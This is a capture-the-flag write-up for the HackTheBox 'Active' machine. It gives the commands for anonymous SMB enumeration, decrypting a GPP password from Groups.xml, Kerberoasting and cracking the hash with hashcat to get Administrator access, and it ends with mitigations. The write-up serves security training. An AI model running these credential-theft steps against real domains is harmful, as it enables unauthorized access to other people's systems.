Active

Overview

Machine: Active Platform: HackTheBox Difficulty: Easy OS: Windows

This machine focuses on SMB enumeration, Group Policy Preferences (GPP) credential extraction, and Kerberoasting.

Kill Chain

  1. Anonymous SMB access
  2. Retrieve Groups.xml from SYSVOL
  3. Decrypt GPP password
  4. Kerberoast Administrator account
  5. Crack hash -> Administrator access

Needed Tools

Recon

  • Add the target IP address to the local /etc/hosts file.
echo "$IP active.htb" | sudo tee -a /etc/hosts
  • Perform an Nmap scan to identify open ports and running services.
nmap -Pn active.htb

nmap nmap

nmap -sCV active.htb

Nmap-2 Nmap-2

  • Verify whether anonymous (guest) access is enabled on SMB.
nxc smb active.htb -u guest -p ''
  • Enumerate accessible SMB shares using guest credentials.
smbclient -N -L active.htb

smbclient smbclient

Enumeration

  • List the contents of the accessible SMB shares.
smbclient //active.htb/Replication -N

smbclient smbclient

  • Perform a recursive enumeration of all files within the shares.
recurse ON
ls

smbclient smbclient

  • Identify and retrieve the groups.xml file.
more \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

Initial Access

smbmap smbmap

  • Extract embedded credentials from the groups.xml file.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\*******" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Propertiesaction="U" newName="" fullName="" description="" cpassword="******" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\*******"/></User>
</Groups>

Group Policy Preferences (GPP) can store credentials in XML files such as Groups.xml. These passwords are encrypted using a static AES key, which is publicly known. This allows attackers to decrypt them easily.

  • Decrypt the retrieved password from the groups.xml file.
gpp-decrypt *******
  • Validate the credentials using SMBmap
smbmap -u ******* -p "*******" -H active.htb

smbmap smbmap

  • Establish an SMB session using smbclient.
smbclient //active.htb/Users -U ******* *******
  • Locate and retrieve the user flag.
more *******\Desktop\user.txt

Privilege escalation

  • Identify accounts vulnerable to Kerberoasting.

Kerberoasting targets service accounts with Service Principal Names (SPNs). These accounts can request Kerberos service tickets, which can be extracted and cracked offline to recover plaintext passwords.

  • Obtain the Kerberos service ticket hash for a privileged account (e.g., Administrator).
python targetedKerberoast.py -d active.htb -u ******* -p *******

smbclient smbclient

  • Crack the obtained Kerberos hash to recover plaintext credentials.
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

hashcat hashcat

  • Authenticate to SMB as the Administrator using smbclient.
smbclient //active.htb/Users -U Administrator *******

smbclient smbclient

  • Locate and retrieve the root (administrator) flag
more Administrator\Desktop\root.txt

Possible Mitigation

  • Disable Anonymous SMB Access
  • Remove Group Policy Preference Credentials
  • Use strong, complex passwords for service accounts and grant them least possible Privileges
  • Monitor SMB access patterns